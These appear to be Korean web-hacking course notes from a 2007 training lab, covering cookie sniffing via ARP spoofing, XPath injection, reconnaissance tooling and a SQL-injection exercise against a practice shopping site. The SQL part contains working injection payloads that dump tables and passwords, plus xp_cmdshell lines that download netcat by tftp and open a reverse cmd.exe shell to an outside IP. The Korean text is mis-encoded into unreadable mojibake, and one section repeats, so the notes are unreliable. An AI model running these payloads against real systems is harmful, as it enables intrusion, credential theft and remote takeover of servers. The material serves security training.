์‚ฌ์šฉ์ž ์ž„์˜์กฐ์ž‘์„ ํ†ตํ•š ๊ณต๊ฒฉ์‹œ๋„

์„ธ์…˜ ์ดˆ๊ธฐ ์ƒ์„ฑ์‹œ๋งˆ๋‹ค ์ƒˆ๋กœ์šด ID๋ฅผ ์ƒ์„ฑ

์žฌ์ƒ๊ณต๊ฒฉ

์‹ค์Šต

Cookie๊ฐ’์„ ์Šค๋‹ˆํ•‘ ํ•ด์„œ ์ƒ๋Œ€๋ฐฉ Cookie๊ฐ’์œผ๋กœ ์ƒ๋Œ€๋ฐฉ ๊ณ„์ •์œผ๋กœ ๋กœ๊ทธ์ธ

์‹ค์Šตํ™˜๊ฒฝWinArpSpoof or CainampAbel or wireshark

Wireshark๋กœ arp ์Šคํ‘ธํ•‘์„ ํ•ด์„œ ํŒจํ‚ท์ด ๋‚˜์—๊ฒŒ ๋„˜๊ฒจ์˜ค๊ฒŒ ๋งŒ๋“ž๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 6

ํ™”๋ฉด๊ณผ ๊ฐ™์ด wireshark๋ฅผ ์ค€๋น„ํ•š๋‹ค

์Šคํ‘ธํ•‘์„ ํ•˜๊ณ  ์žˆ์œผ๋ฉด ์ƒ๋Œ€๋ฐฉ ์ธก์—์„œ wwwnavercom ์— ๋กœ๊ทธ์ธ์„ ํ•˜๊ฒŒ ๋˜๋ฉด ํŒจํ‚ท์ด ๋‚ ๋ผ ์˜ค๊ฒŒ ๋œ๋‹ค ์—ฌ๊ธฐ์„œ ์šฐ๋ฆฌ๋Š”

๋กœ๊ทธ์ธ ๊ด€๋ ฆ ํŒจํ‚ท ๋งŒ ์•Œ์•„๋ณด๊ธฐ ์œ„ํ•ด ํ•„ํ„ฐ์— httprequestmethod == POST ๋ฅผ ์นš๋‹ค

๋‹ค์Œ๊ณผ ๊ฐ™์ด ๋‚˜์˜ฌ ๊ฒƒ์ด๋‹ค Set-Cookie๋ถ€๋ถ„์„ ๋ณต์‚ฌํ•ด ๋‘”๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 7

๋‹ค์Œ๊ณผ ๊ฐ™์ด ์„ค์ •์„ ์กฐ๊ธˆ ๋ณ€๊ฒฝ ์‹œ์ผœ์ค€๋‹ค

๋‹ค์Œ๊ณผ ๊ฐ™์ด ์…‹ํŒ…์„ ํ•ด๋‘”๋‹ค

๊ทธ๋Ÿผ ๋‹ค์Œ๊ณผ ๊ฐ™์ด ๋กœ๊ทธ์ธ์ด ๋˜๋Š” ์žฅ๋ฉด์„ ๋ณผ ์ˆ˜ ์žˆ์„ ๊ฒƒ์ด๋‹ค

์—ฌ๊ธฐ์„œ๋Š” XSS๋ฅผ ์‚ฌ์šฉํ•˜์ง€ ์•Š๊ณ  Network์ƒ์—์„œ Cookie๊ฐ’์„ ํ›”์ณ์„œ ๊ณ„์ •์„ ํ›”์ณ ๋ณด์•˜๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 8

XML ํŠน์ง•

๋ฌธ์„œ์˜ ๋‚ด์šฉ๊ณผ ๋””์ž์ธ์ด ์™„์ ‚ํžˆ ๋ถ„๋ฆฌ

๋ฌธ์„œ๊ตฌ์กฐ๋Š” XML๋กœ ํ”„๋ฆฌ์ žํ…Œ์ด์…˜์€ XSL์„ ํ†ตํ•ด

๋‹ค์–‘ํ•š ๋ฐฉ์‹์˜ ๋งํฌ ๊ธฐ๋Šฅ ์ œ๊ณต

ํ‘œ์ค€ํ™”๋œ DTD์„ ํ†ตํ•ด ๋ชจ๋“ž ๋ถ„์•ผ์— ์‚ฌ์šฉ๊ฐ€๋Šฅ

DOM(Document Object Model)

SAX(Simple API for XML)

XML๊ตฌ์กฐ2๊ฐ€์ง€ ๋Œ€ํ‘œ์  ๋ชจ๋ธ์กด์žฌ

๊ตฌ์„ฑ์š”์†Œ ์„ค๋ช…

์—˜๋ฆฌ๋จผํŠธ ๋งˆํฌ์—… ํƒœ๊ทธ์™€ ๊ทธ ์•†์— ํฌํ•จ๋œ ๋‚ด์šฉ

๋นˆ ์—˜๋ฆฌ๋จผํŠธ ๋‚ด์šฉ์„ ํฌํ•จํ•˜์ง€ ์•Š๋Š” ๋นˆ ์—˜๋ฆฌ๋จผํŠธ

๋ฃจํŠธ ์—˜๋ฆฌ๋จผํŠธ ๋ฌธ์„œ๋‚ด ๋ชจ๋“ž ์—˜๋ฆฌ๋จผํŠธ์™€ ๋‚ด์šฉ์„ ํฌํ•จํ•˜๊ณ  ์žˆ๋Š” XML ๋ฌธ์„œ์˜ ์—˜๋ฆฌ๋จผํŠธ

์†์„ฑ ์—˜๋ฆฌ๋จผํŠธ์— ํฌํ•จ๋˜์–ด ์ถ”๊ฐ€์ ์ธ ์ •๋ณด๋ฅผ ์ œ๊ณต

ltimg src=balbalbalgtbalbalballtimggt

์—”ํ‹ฐํ‹ฐ ํ…์ŠคํŠธ ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฐ์ดํ„ฐ ๋น„ ์•„์Šคํฌ ๋ฌธ์ž๋ฅผ ์ €์žฅํ•˜๋Š”๋ฐ ์‚ฌ์šฉ

์ฒ˜๋ฆฌ๋ช…๋ น ์ ‚์ฒด ๋ฌธ์„œ๋‚˜ ๋ฌธ์„œ์˜ ์ผ๋ถ€๋ฅผ ์ฒ˜๋ฆฌํ•˜๋Š” ์‘์šฉํ”„๋กœ๊ทธ๋žจ๊ณผ ์—ฐ๊ฒฐํ•ด ์ฃผ๋Š” ๋ช…๋ น์–ด lt gt

์ฃผ์„ XML ํ”„๋กœ์„ธ์„œ๊ฐ€ ํ•ด์„ํ•˜์ง€ ์•Š๋Š” ์„ค๋ช…๋ฌธ

lt-- --gt

CDATA์„น์…˜ ํŠน์ˆ˜ํ•š ๋ฌธ์ž๋ฅผ ์ผ๋ฐ˜ ํ…์ŠคํŠธ๋กœ ์ธ์‹ํ•˜๋„๋ก ํ•˜๋Š” ํ‘œ๊ธฐ๋ฒ•

lt[CDATA[hellipstring]]gt

Xpath

Xml ๋ฌธ์„œ์— ๋Œ€ํ•š ์งˆ์˜์–ถ์–ด

SQL๋ฌธ์€ ํŠน์ • ํ…Œ์ด๋ธ”์˜ ํ–‰๊ณผ ์—ด์„ ์„ ํƒ

Xpath๋Š” ํŠน์ • XML๋ฌธ์„œ์˜ ๋…ธ๋“œ์™€ ๋…ธ๋“œ์…‹์„ ์„ ํƒ

๊ด€๋ ฆ Issue

์˜ˆ)bookbook[ISBN=1111 or 1=1]

๋ชจ๋“ž book ๋…ธ๋“œ๋“ค์— ์ ‘๊ทบ๊ฐ€๋Šฅ

Xpath๊ณต๊ฒฉ

๋Œ€ํ˜• ํŽ˜์ด๋กœ๋“œ ๊ณต๊ฒฉ(like DOS)

XML์˜ ๋…ธ๋“œ์™€ ์†์„ฑ์ด ์ค‘์ฒฉ ์„ ์–ถ๋  ์ˆ˜ ์žˆ๋‹ค๋Š” ์ ์„ ์•…์šฉ

ํŠน์ • ๋…ธ๋“œ์•†์— ๋™์ผ ๋…ธ๋“œ๋ช… ๋ฐ˜๋ณต์„ ์–ถ์†์„ฑ ๋ฌดํ•š์„ ์–ถ

์žฌ๊ท€ ํŽ˜์ด๋กœ๋“œ ๊ณต๊ฒฉ

`or loginid(nodeLoginID())=LoginID or a=b

07๋…„ ํ•ดํ‚น๋ฐฉ์–ด๋Œ€ํšŒ๋ฌธ์ œ

WebService

์ •์˜๋„คํŠธ์›Œํฌ์ƒ์—์„œ ์ ‘๊ทบ ๊ฐ€๋Šฅํ•š ์†Œํ”„ํŠธ์›จ์–ด ๊ธฐ๋Šฅ๋‹จ์œ„๋กœ ํ”Œ๋žซํผ ํ”„๋กœ๊ทธ๋ž˜๋ฐ ์–ถ์–ด ๋ฐ ์ปดํฌ๋„ŒํŠธ ๋ชจ๋ธ์— ๋…

๋ฆฝ์ ์ธ ๊ธฐ์ˆ ๋กœ ๋งŒ๋“ค์–ด์ง‚ ์†Œํ”„ํŠธ์›จ์–ด

์›น ํ•ดํ‚น ๊ณต๊ฒฉ ์ ƒ์ฐจ

FootPrinting Scanning Enumeration

PllferingEscalatingPrivledge

GainingAccess

CreatingBack Doors

CoveringTracks

Web Hacking 2์ผ์ฐจ

2007๋…„ 10์›” 23์ผ ํ™”์š”์ผ

์˜ค์ ‚ 934

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 9

์›น ํ•ดํ‚น ๊ณต๊ฒฉ ์ ƒ์ฐจ

FootPrinting Scanning Enumeration

PllferingEscalatingPrivledge

GainingAccess

CreatingBack Doors

CoveringTracks

๊ณต๊ฒฉ์ ƒ์ฐจ

์ •๋ณด์ˆ˜์ง‘

Profiling

๋ถ„์„

Analysis

๊ณต๊ฒฉ

AttackEcploit

hellip

์‚ฌํšŒ๊ณตํ•™

๊ฒ€์ƒ‰์—”์ง‚

FootPrinting

PortScan

Web Site ๋ฏธ๋Ÿฌ๋ง

Web ๊ตฌ์กฐ๋ถ„์„

์˜๋ฏธ์žˆ๋Š” ์ •๋ณด๋กœ ๊ฐ€๊ณต

Account ์ˆ˜์ง‘

OS์ •๋ณด์ทจ์•ฝ์ 

ํฌํŠธ๋ณ„์„œ๋น„์Šค์ทจ์•ฝ์ 

์ ‚์ฒด๊ตฌ์กฐ์†Œ์Šค์ฃผ์„

์ฟ ํ‚ค๋“ฑ ๋ถ„์„

์ •๋ณด์— ๊ทบ๊ฑฐํ•š ๊ณต๊ฒฉ

BF Guessing

OSNetwork Service

Exploitation

๊ถŒํ•š์ƒ์Šน

OWASPWASC๋“ฑ์— ์˜ํ•š ๊ณต๊ฒฉ

๋ณด๊ณ ์„œ

1์ •๋ณด์ˆ˜์ง‘

์‚ฌํšŒ๊ณตํ•™

๋„๋ฉ”์ธ ์ •๋ณด IP Block ์ •๋ณด

Whois

Dig

Whosip

Netcraft

๊ธฐ๋ณธ์ •๋ณด

httpwebarchiveorg

Google Cache

Web Archive

httpjohnnyihackstuffcom

์‹ฌ์ •์žฌ(googledorkpdf)

Google Dork

Google hacking DB ์‚ฌ์šฉ

Google API Key(ํ‚ค ๋ฐœ๊ธ‰ ํ์ง€)

SiteDigger Wikto

๊ฒ€์ƒ‰์—”์ง‚(No-Tech Hacking)

๊ตฌ๊ธ€ ํ•ดํ‚น ํ‚ค์›Œ๋“œ ์ œ๊ณต ์‚ฌ์ดํŠธ

Footprinting Web Server

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 10

AFD(Acitive Filter Detection)

ICMP TTL๊ฐ’์„ ์กฐ์ ƒํ•ด๊ฐ€๋ฉฐ ์›น ์„œ๋ฒ„ ํƒ์ง€

netcraftcom

Stealth Scan-sS

Normal Scan-sT-sU

Network Services Version Scan-sV

OSDetection-O-A

DoNotPing_P0

Idle scan

IDS์šฐํšŒ

httpunicornscanorg

Unicorn scan -mT -p -v -r 2501921681024q

Unicornscan

Nc

jikto

Port Scan(Port Mapping)

httTrack

Web Site Mirroring

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 11

-grepegrep awksedsortuniq(moreheadless)๋“ฑ ํ™œ์šฉ

Mirroring ํ›„ ์ •์  ๋ถ„์„

balckwindow

InteliTamper

Wikto

Web๊ตฌ์กฐ ๋ถ„์„(๋ฐ˜์ž๋™)

Httpwatch

TamperlE

Cooxie

LiveHttpHeaders(firefox)

Command line tool(nccurlopenssl)

Manual Analysis

ParosWebscrabFidderBurpIntruder

SoftwareProxy

Web๊ตฌ์กฐ๋ถ„์„(์ˆ˜์ž‘์—…)

๊ด€๋ฆฌ์žํŽ˜์ด์ง€

์ž๋ฃŒ์‹ค(web shell)

ํ†ต๊ณ„ ์ƒํƒœ ํŽ˜์ด์ง€

ํšŒ์›๋“ฑ๋ก์šฐํŽธ๋ฒˆํ˜ธ ์กฐํšŒ(์ธ์ ์…˜๊ณต๊ฒฉ)

(์ธ์ ์…˜์€ ์ž…๋ ฅ๊ฐ’์„ ๋„ฃ์—ˆ์„๋•Œ ๊ฒฐ๊ณผ๋ฅผ ๋ฟŒ๋ ค์ฃผ๋Š” ํŽ˜์ด์ง€๋ฅผ ์ฐพ์•„์•ผํ•š๋‹ค)์•†๋ณด์—ฌ์ฃผ๋Š”๊ฑด ๋ธ”๋ผ์ธ๋“œ ์ธ์ ์…˜

์•”ํ˜ธ๋ถ„์‹ค(์•”ํ˜ธ ํš๋“ ์ˆ˜์›”)

์ •๋ณด์ˆ˜์ •(์ˆ˜ํ‰์ˆ˜์ง์ƒ์Šน๊ธฐํšŒ)

ํšŒ์›๊ฐ€์ž…ํŽ˜์ด์ง€

๊ฒฐ์ œ ํŽ˜์ด์ง€

Basic Banner Garbbing

Http resonse ํ—ค๋” ์ˆš์„œ

Http resonse ํ—ค๋” ์กด์žฌ ์œ ๋ฌด

Http resonse ํ—ค๋”์˜ ํŠน์ • ๊ฐ’

Tracehead ๋“ฑ์— ๋Œ€ํ•š ์ƒ์ดํ•š ์‘๋‹ต

๋ฐ์ดํ„ฐ์—†์ด ์ ‚์†กํ•š put์— ๋Œ€ํ•š์‘๋‹ต

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 12

Tracehead ๋“ฑ์— ๋Œ€ํ•š ์ƒ์ดํ•š ์‘๋‹ต

๋ฐ์ดํ„ฐ์—†์ด ์ ‚์†กํ•š put์— ๋Œ€ํ•š์‘๋‹ต

Unexpercted Method ์ ‚์†ก

๋™์ผ์š”์ฒญ ๋ฐ˜๋ณต ์ ‚์†ก

์ทจ์•ฝ์  ์Šค์บ”(system)

Xscan

Nessus

n-stealth security scanner

์ทจ์•ฝ์  ์Šค์บ”(Web Server amp WAS amp Web App)

APP SCANNER

ACUNETIX

NSTALKER SCANNER

์Šค์บ” ISSUE

BASIC DIGEST NTML CERT

FORM-BASED

์ธ์ฆ์ •๋ณด ์„ค์ •

์Šค์บ” ๊ฐ•๋„(๋ฉ€ํ‹ฐ ์ปค๋„ฅ์…˜ ํƒ€์ž„์•„์›ƒ ๊ณต๊ฒฉ๋ชจ๋“œ๋น„๊ณต๊ฒฉ๋ชจ๋“œ)

๋ถ„์„

์˜๋ฏธ์žˆ๋Š” ์ •๋ณด๋กœ ๊ฐ€๊ณต

ACCOUNT ์ˆ˜์ง‘

OS์ •๋ณด์— ๋”ฐ๋ฅธ ์ทจ์•ฝ์  ์ˆ˜์ง‘

ํฌํŠธ๋ณ„ ์„œ๋น„์Šค ์ทจ์•ฝ์ 

์›น์„œ๋ฒ„ ์ ‚์ฒด๊ตฌ์กฐ ๋ถ„์„

์ฃผ์„

ํžˆ๋“ž ํ•„๋“œ

์†Œ์Šค๋ถ„์„

์ฟ ํ‚ค๋ถ„์„

์„ธ์…˜ID์ƒ์„ฑ ์ทจ์•ฝ์  ๋ถ„์„

๊ณต๊ฒฉ

์ •๋ณด์— ๊ทบ๊ฑฐํ•š ๊ณต๊ฒฉ

๋ฌด์ž‘์œ„ ๊ณต๊ฒฉ

์‚ฌ์ ‚๊ณต๊ฒฉ

๊ณต๊ฒฉ์ดˆ์ 

์ˆ˜์ง‘๋œ ACCOUNT ์ •๋ณด๋ฅผ์ด์šฉ

OSNETWORK SERVICE ๊ณต๊ฒฉ

WEBSERVER WEBAPP SERVER WEBAPPLICATION

SQLISCANNER

๊ถŒํ•š ์ƒ์Šน

์ˆ˜ํ‰

ํšŒ์›์ •๋ณด ์ˆ˜์ •

Cookie Stealing

CSRF

์ˆ˜์ง

CSRF

CSRF๋ฅผ ํ†ตํ•ด DMZ์˜์—ญ์— ์ ‘์†ํ•š ๊ด€๋ฆฌ์ž์—๊ฒŒ ๋‚ด๋ถ€ ZONE์ชฝ์œผ๋กœ ๊ฐ•์ œ REQEUST๋ฅผ ํ•˜๋„๋ก ์กฐ์ž‘ ๊ฐ€๋Šฅ

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 13

์ ‚์ œ์กฐ๊ฑด์€ ๋‚ด๋ถ€๋ง์˜ IP APPLICATION PARAMETERS ๋ฅผ ๋ชจ๋‘ ์•Œ๊ณ  ์žˆ์„ ๊ฒฝ์šฐ

CSRF๋ฅผ ํ†ตํ•ด DMZ์˜์—ญ์— ์ ‘์†ํ•š ๊ด€๋ฆฌ์ž์—๊ฒŒ ๋‚ด๋ถ€ ZONE์ชฝ์œผ๋กœ ๊ฐ•์ œ REQEUST๋ฅผ ํ•˜๋„๋ก ์กฐ์ž‘ ๊ฐ€๋Šฅ

OWASPWASC

์ˆ˜์ž‘์—…

์›น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ์ทจ์•ฝ์  ๊ณต๊ฒฉ

์œ„ํ—˜๋„์— ๋”ฐ๋ผ ๊ณต๊ฒฉ

๊ฐ€์šฉ์„ฑ์„ ๋–จ์–ดํŠธ๋ฆฌ๋Š” ๊ณต๊ฒฉ์ œ์™ธ

์„œ๋ฒ„์˜ shellํš๋“ or๊ด€๋ฆฌ์ž ์•”ํ˜ธ ํš๋“

๋ฐ์ดํ„ฐ ์—ด๋žŒ ํ—ˆ์šฉ๊ธˆ์ง€

Ethical Hacking์ธ ๊ฒฝ์šฐ ๊ณ ๊ฐ์˜ ์š”๊ตฌ์‚ฌํ•ญ ๋ฐ˜์˜

์˜คํƒ์ œ๊ฑฐ

์›น ์ทจ์•ฝ์  ์Šค์บ๋„ˆ ๊ฒฐ๊ณผ ๋ถ„์„

ONE WAY WEB HACKING ์ฝ์–ด๋ณด๊ธฐ

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 14

SQL INJECTION

GETPOST ํŒŒ๋ผ๋ฏธํ„ฐ HTTP REQUEST ํŒŒ๋ผ๋ฏธํ„ฐ ์ฟ ํ‚ค ๊ฐ’

๊ธฐํƒ€ ์„œ๋ฒ„์—์„œ ์ฒ˜๋ฆฌํ•˜๋Š” ๋ชจ๋“ž ํด๋ผ์ด์–ถํŠธ ๊ฐ’

ํด๋ผ์ด์–ถํŠธ ์ž…๋ ฅ ๊ฐ’ ์œ ํ˜•

ํด๋ผ์ด์–ถํŠธ์—์„œ ์ž…๋ ฅ๋œ ๊ฐ’์ด ์œ ํšจ์„ฑ ๊ฒ€์ฆ๊ณผ์ • ์—†์ด sql ๋ฌธ์— ํฌํ•จ๋˜๋Š” ๊ฒฝ์šฐ

MAIN CAUSE

Impact

์ธ์ฆ์šฐํšŒ

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ๋คํ”„ ์กฐ์ž‘ ์ƒ์„ฑ ํŒŒ๊ดด

DML D์ด ๋“ฑ ์ƒ์ƒํ•› ์ˆ˜ ์žˆ๋Š” ๋ชจ๋“ž ์ž‘์—…

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ปจํŠธ๋กค

์‹œ์Šคํ…œ ๋ช…๋ น์–ด ์‹คํ–‰

COUNTERMEASURE

์ž…๋ ฅ๊ฐ’ ๊ฒ€์ฆ

์ตœ์†Œ๊ถŒํ•š ๋ถ€์—ฌ(SYSTEMDBMSDatabase)

์ธ์ฆ์šฐํšŒ

์ธ๊ฐ€๋œ ์‚ฌ์šฉ์ž์˜ ID PW ๋ฅผ ์ž…๋ ฅํ•˜์ง€ ์•Š๊ณ ๋„ ์ธ์ฆ์„ ์šฐํšŒํ•˜๋Š” ํ–‰์œ„

ID PW๋ฅผ ๋ชจ๋ฅด๋Š” ์ƒํƒœ์—์„œ๋„ ์ ์ ƒํžˆ ๊ตฌ์„ฑ๋œ ๋ฌธ์ž์—ด์„ ์ž…๋ ฅํ•˜์—ฌ ์ธ์ฆ์„ ์šฐํšŒํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ

์ž…๋ ฅ๋œ ๋ฌธ์ž์—ด์€ SQL ๋ฌธ์˜ ์ผ๋ถ€๋กœ ์‚ฝ์ž…์ด ๋˜์–ด ์‹คํ–‰๋จ

์ธ์ฆ ์šฐํšŒ์— ์‚ฌ์šฉ๋˜๋Š” ์ž…๋ ฅ๊ฐ’์€

๋ฌธ๋ฒ•์ƒ ์˜ค๋ฅ˜๋ฅผ ์‹œํ‚ค์ง€ ์•Š์•„์•ผ ํ•จ

WHERE์ ƒ์˜ ์กฐ๊ฑด์ด ํ•ญ์ƒ ์ฐธ์ด ๋˜๋„๋ก ์กฐ์ž‘

์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์˜ ์ผ๋ฐ˜์ ์ธ ์ธ์ฆ ์ ƒ์ฐจ

1IDPW ์ž…๋ ฅ

2SQL Query ์ƒ์„ฑ

3DATABASE์— ์ฟผ๋ฆฌ ์ ‚์†ก

4DATABASE์—์„œ ์ฟผ๋ฆฌ๋ฌธ ์‹คํ–‰

5๋ฐ˜ํ™˜๋˜๋Š” RETURN๊ฐ’์— ๋”ฐ๋ผ ์ธ์ฆ์—ฌ๋ถ€ํŒ๋‹จ

SQL INJECTION ์ ƒ์ฐจ

DB ์Šคํ‚ค๋งˆํŒŒ์•… (DBTABLECOLUMN ํ™˜๊ฒฝ์ •๋ณด๋“ฑ ํŒŒ์•…

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ด๋ฆ„ ํŒŒ์•…

ํ…Œ์ด๋ธ”์ด๋ฆ„ ํŒŒ์•…

์ปฌ๋Ÿผ์ด๋ฆ„ ํŒŒ์•…

๋ชจ๋“ž SQL INJECTION์€ ์ž…๋ ฅ๊ฐ’์— ๋Œ€ํ•š ์œ ํšจ์„ฑ ๊ฒ€์ฆ์„ ํ•˜์ง€ ์•Š๊ธฐ ๋•Œ๋ฌธ์— ๋ฐœ์ƒํ•š๋‹ค ์—๋Ÿฌ๋ฅผ ์œ ๋„ํ•˜์—ฌ ํ•„๋“œ์˜ ์ •๋ณด๋ฅผ ๋ˆ„์ถœ์‹œํ‚จ๋‹ค

DBMS ๊ฐ€ ์ ์ ƒํ•š ๊ถŒํ•š์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์— ์ ‘๊ทบํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ

DBMS๊ฐ€ ์ ์ ƒํ•š ๊ถŒํ•š์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ ์ฟผ๋ฆฌ๋ฅผ ํ†ตํ•š ์„œ๋น„์Šค ์ œ์–ด๊ฐ€ ๊ฐ€๋Šฅ

OYES MALL (SQL INJECTION์„ ์ด์šฉํ•š ๊ด€๋ฆฌ์ž ๊ถŒํ•š ํš๋“ ์‹ค์Šต

ํ™˜๊ฒฝ์€(2000ASPMS-SQL2000)

์ค€๋น„๋œ ์‡ผํ•‘๋ชฐ์ด๋‹ค

์ฒซ๋ฒˆ์งธ ๋ฐฉ๋ฒ•

Web Hacking 3์ผ์ฐจ

2007๋…„ 10์›” 25์ผ ๋ชฉ์š”์ผ

์˜ค์ ‚ 1200

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 15

group by(user_id) -- ๋ฅผ ์ด์šฉํ•ด ํ…Œ์ด๋ธ”์„ ์•Œ์•„๋‚ธ๋‹ค

Member ํ…Œ์ด๋ธ”์•†์—์žˆ๋Š” num์ด๋ผ๋Š” ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋ƒˆ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 16

union select from members where user_id like o ํ•ด๋ด๋ผ ๋กœ๊ทธ์ธ ๋ ๊ฑฐ๋‹ค

๋‘๋ฒˆ์งธ ๋ฐฉ๋ฒ•

์ฃผ์†Œ๋ก์กฐํšŒ ๋ถ€๋ถ„์— SQL INJECTION์„ ํ•˜์˜€๋‹ค

$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์™€๊ฐ™์ด ์งˆ์˜๋ฅผ ํ•˜๋ฉด ํ† ํ•ด๋‚ธ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 17

์šฐ๋ฆฌ๋Š” members ๋ผ๋Š” ํ…Œ์ด๋ธ”์ด ์กด์žฌํ•˜๋Š” ๊ฒƒ์„ ๋ณผ์ˆ˜ ์žˆ์„ ๊ฒƒ์ด๋‹ค

$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --

Members์— ๋Œ€ํ•š ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋‚ธ๋‹ค

$ or 1=(select top 1 user_id from members)--

User id์˜ ์ปฌ๋Ÿผ์— top 1 ์ธ๊ฒƒ์„ ํ† ํ•ด๋‚ธ๋‹ค

union select 1234 user_idpasswd from members where user_id=oyes --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 18

์œผ์•„~password ๊ฐ€ oyesmall ์ด๋ผ๋„ค ์‹ค์Šต ๋

File Uploading

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --

$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --

์•„์ฃผ ๊ฐ„๋‹จํ•˜๋‹ค

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 19

ํ™”๋ฉด๊ณผ ๊ฐ™์ด wireshark๋ฅผ ์ค€๋น„ํ•š๋‹ค

์Šคํ‘ธํ•‘์„ ํ•˜๊ณ  ์žˆ์œผ๋ฉด ์ƒ๋Œ€๋ฐฉ ์ธก์—์„œ wwwnavercom ์— ๋กœ๊ทธ์ธ์„ ํ•˜๊ฒŒ ๋˜๋ฉด ํŒจํ‚ท์ด ๋‚ ๋ผ ์˜ค๊ฒŒ ๋œ๋‹ค ์—ฌ๊ธฐ์„œ ์šฐ๋ฆฌ๋Š”

๋กœ๊ทธ์ธ ๊ด€๋ ฆ ํŒจํ‚ท ๋งŒ ์•Œ์•„๋ณด๊ธฐ ์œ„ํ•ด ํ•„ํ„ฐ์— httprequestmethod == POST ๋ฅผ ์นš๋‹ค

๋‹ค์Œ๊ณผ ๊ฐ™์ด ๋‚˜์˜ฌ ๊ฒƒ์ด๋‹ค Set-Cookie๋ถ€๋ถ„์„ ๋ณต์‚ฌํ•ด ๋‘”๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 7

๋‹ค์Œ๊ณผ ๊ฐ™์ด ์„ค์ •์„ ์กฐ๊ธˆ ๋ณ€๊ฒฝ ์‹œ์ผœ์ค€๋‹ค

๋‹ค์Œ๊ณผ ๊ฐ™์ด ์…‹ํŒ…์„ ํ•ด๋‘”๋‹ค

๊ทธ๋Ÿผ ๋‹ค์Œ๊ณผ ๊ฐ™์ด ๋กœ๊ทธ์ธ์ด ๋˜๋Š” ์žฅ๋ฉด์„ ๋ณผ ์ˆ˜ ์žˆ์„ ๊ฒƒ์ด๋‹ค

์—ฌ๊ธฐ์„œ๋Š” XSS๋ฅผ ์‚ฌ์šฉํ•˜์ง€ ์•Š๊ณ  Network์ƒ์—์„œ Cookie๊ฐ’์„ ํ›”์ณ์„œ ๊ณ„์ •์„ ํ›”์ณ ๋ณด์•˜๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 8

XML ํŠน์ง•

๋ฌธ์„œ์˜ ๋‚ด์šฉ๊ณผ ๋””์ž์ธ์ด ์™„์ ‚ํžˆ ๋ถ„๋ฆฌ

๋ฌธ์„œ๊ตฌ์กฐ๋Š” XML๋กœ ํ”„๋ฆฌ์ žํ…Œ์ด์…˜์€ XSL์„ ํ†ตํ•ด

๋‹ค์–‘ํ•š ๋ฐฉ์‹์˜ ๋งํฌ ๊ธฐ๋Šฅ ์ œ๊ณต

ํ‘œ์ค€ํ™”๋œ DTD์„ ํ†ตํ•ด ๋ชจ๋“ž ๋ถ„์•ผ์— ์‚ฌ์šฉ๊ฐ€๋Šฅ

DOM(Document Object Model)

SAX(Simple API for XML)

XML๊ตฌ์กฐ2๊ฐ€์ง€ ๋Œ€ํ‘œ์  ๋ชจ๋ธ์กด์žฌ

๊ตฌ์„ฑ์š”์†Œ ์„ค๋ช…

์—˜๋ฆฌ๋จผํŠธ ๋งˆํฌ์—… ํƒœ๊ทธ์™€ ๊ทธ ์•†์— ํฌํ•จ๋œ ๋‚ด์šฉ

๋นˆ ์—˜๋ฆฌ๋จผํŠธ ๋‚ด์šฉ์„ ํฌํ•จํ•˜์ง€ ์•Š๋Š” ๋นˆ ์—˜๋ฆฌ๋จผํŠธ

๋ฃจํŠธ ์—˜๋ฆฌ๋จผํŠธ ๋ฌธ์„œ๋‚ด ๋ชจ๋“ž ์—˜๋ฆฌ๋จผํŠธ์™€ ๋‚ด์šฉ์„ ํฌํ•จํ•˜๊ณ  ์žˆ๋Š” XML ๋ฌธ์„œ์˜ ์—˜๋ฆฌ๋จผํŠธ

